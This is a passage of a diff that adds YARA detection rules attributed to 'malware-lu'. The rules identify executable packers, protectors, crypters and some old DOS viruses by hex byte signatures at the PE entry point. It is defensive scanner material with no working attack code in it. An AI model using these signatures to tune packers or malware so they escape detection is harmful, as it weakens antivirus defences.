+		$a0 = { BE ?? ?? 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0971v0976
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkv040b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 6A ?? FF ?? ?? ?? ?? ?? 50 50 2D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePECrypt102emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 05 50 E8 08 00 00 00 EA FF 58 EB 18 EB 01 0F EB 02 CD 20 EB 03 EA CD 20 58 58 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENv211212FisunAlexander
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE ?? 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StonesPEEncruptorv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11MTEc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 1B ?? ?? ?? E9 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CreateInstallStubvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZip32bitSFXv8xmodule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upxv12MarcusLazlo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPACKv10byANAKiN1998
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 ?? E9 ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeSpalsher1x3xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 9C 60 8B 44 24 24 E8 00 00 00 00 5D 81 ED 00 00 00 00 50 E8 ED 02 00 00 8C C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv10803AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }
+	$a1 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
+	$a2 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD }
+	$a3 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point
+}
+	
+	
+rule VMProtect07x08PolyTech
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeShieldProtectorV36wwwexeshieldcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WerusCrypter10Kas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 98 11 40 00 6A 00 E8 50 00 00 00 C9 C3 ED B3 FE FF FF 6A 00 E8 0C 00 00 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 A8 10 40 00 FF 25 B0 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule Themida10xx1800compressedengineOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
+	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 5A ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule CHECKPRGc1992
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor11CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? 12 00 00 E9 ?? 0C 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1028
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E FC 83 ?? ?? 81 ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E B8 FE 4B CD 21 81 FF BB 55 ?? ?? 07 ?? ?? ?? 07 B4 49 CD 21 BB FF FF B4 48 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEQuakev006byfORGAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 A5 00 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 3D ?? 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? 00 00 5B ?? 00 00 6E ?? 00 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 }
+
+condition:
+		$a0
+}
+	
+	
+rule LTCv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071b7
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 48 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 44 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnknownJoinersignfrompinch260320070212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 44 90 4C 90 B9 DE 00 00 00 BA 00 10 40 00 83 C2 03 44 90 4C B9 07 00 00 00 44 90 4C 33 C9 C7 05 08 30 40 00 00 00 00 00 90 68 00 01 00 00 68 21 30 40 00 6A 00 E8 C5 02 00 00 90 6A 00 68 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv100v100d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule APEX_CBLTApex40500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StealthPEv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Anti007V26LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 57 72 69 74 65 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule AppEncryptorSilentTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 1F 1F 40 00 B9 7B 09 00 00 8D BD 67 1F 40 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VirogenCryptv075
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov300a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv300v301Extractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 6A ?? 06 06 8C D3 83 ?? ?? 53 6A ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxUddy2617
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? 8C C8 8E D8 8C ?? ?? ?? 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? 8C C8 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? B8 AB 9C CD 2F 3D 76 98 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PLINK8619841985
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 8C C7 8C D6 8B CC BA ?? ?? 8E C2 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv10804AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 41 06 00 00 EB 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule aPackv098m
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C8 8E D8 05 ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B2 ?? BD ?? ?? 33 C9 50 A4 BB ?? ?? 3B F3 76 }
+
+condition:
+		$a0
+}
+	
+	
+rule BamBamv001Bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 FB ?? ?? 00 E8 6C FD FF FF B9 05 00 00 00 8B F3 BF FB ?? ?? 00 53 F3 A5 E8 8D 05 00 00 8B 3D 03 ?? ?? 00 A1 2B ?? ?? 00 66 8B 15 2F ?? ?? 00 B9 80 ?? ?? 00 2B CF 89 45 E8 89 0D 6B ?? ?? 00 66 89 55 EC 8B 41 3C 33 D2 03 C1 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESHiELDv02v02bv02b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv27
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 EB 22 45 78 65 53 74 65 61 6C 74 68 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D E8 00 00 00 00 5D 81 ED 40 1E 40 00 B9 99 09 00 00 8D BD 88 1E 40 00 8B F7 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule VxHaryanto
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EB 2A 01 8B 0F 1E 5B 03 CB 0E 51 B9 10 01 51 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPRStripperv2xunpacked
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01UPX06Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinker33
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Shrinker32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 75 65 68 00 01 00 00 E8 F1 E6 FF FF 83 C4 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule Shrinker34
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 11 0B 00 00 83 C4 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESPinv13Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv160v165
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv120b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? 00 2B 05 84 ?? ?? 00 A3 ?? ?? ?? 00 83 3D ?? ?? ?? 00 00 74 16 A1 ?? ?? ?? 00 03 05 80 ?? ?? 00 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? 00 01 00 00 00 68 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule EPWv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 57 1E 56 55 52 51 53 50 2E ?? ?? ?? ?? 8C C0 05 ?? ?? 2E ?? ?? ?? 8E D8 A1 ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 68 01 ?? ?? ?? C3 AA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packanoidv1Arkanoid
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? ?? BE ?? ?? ?? ?? E8 9D 00 00 00 B8 ?? ?? ?? ?? 8B 30 8B 78 04 BB ?? ?? ?? ?? 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EscargotV01Meat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 40 30 2E 31 60 68 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SCObfuscatorSuperCRacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C9 8B 1D 00 ?? ?? ?? 03 1D 08 ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D 04 ?? ?? ?? 75 E7 A1 08 ?? ?? ?? 01 05 0C ?? ?? ?? 61 FF 25 0C }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealth275WebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PasswordProtectorcMiniSoft1992
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 0E 0E 07 1F E8 00 00 5B 83 EB 08 BA 27 01 03 D3 E8 3C 02 BA EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C5 ?? ?? ?? B4 30 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VideoLanClientUnknownCompiler
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv14CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 34 2E 2E B8 }
+	$a1 = { 65 58 50 72 2D 76 2E 31 2E 34 2E }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule SkDUndetectablerPro20NoUPXMethodSkD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJcrushv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 FC 8C C8 BA ?? ?? 03 D0 52 BA ?? ?? 52 BA ?? ?? 03 C2 8B D8 05 ?? ?? 8E DB 8E C0 33 F6 33 FF B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv27
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv29
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v103BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC5060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERV15FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3F 00 00 80 66 20 ?? 00 7E 20 ?? 00 92 20 ?? 00 A4 20 ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExcaliburV103forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack10betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 }
+	$a1 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 48 02 00 00 56 FF D3 83 C4 08 8B B5 48 02 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 83 C0 04 89 85 44 02 00 00 EB 7A 56 FF 95 F1 01 00 00 89 85 40 02 00 00 8B C6 EB 4F 8B 85 44 02 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 44 02 00 00 C7 00 20 20 20 00 EB 06 FF B5 44 02 00 00 FF B5 40 02 00 00 FF 95 F5 01 00 00 89 07 83 C7 04 8B 85 44 02 00 00 EB 01 40 80 38 00 75 FA 40 89 85 44 02 00 00 80 38 00 75 AC EB 01 46 80 3E 00 75 FA 46 40 8B 38 83 C0 04 89 85 44 02 00 00 80 3E 01 75 81 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 48 02 00 00 FF 95 FD 01 00 00 61 68 ?? ?? ?? ?? C3 60 8B 74 24 24 8B 7C }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule nMacrorecorder10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 6E 6D 72 5F 74 65 6D 70 2E 6E 6D 72 00 00 00 72 62 00 00 58 C7 41 00 10 F8 41 00 11 01 00 00 00 00 00 00 46 E1 00 00 46 E1 00 00 35 00 00 00 F6 88 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrivateEXEv20a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 E8 00 00 00 00 5B 8B C3 2D }
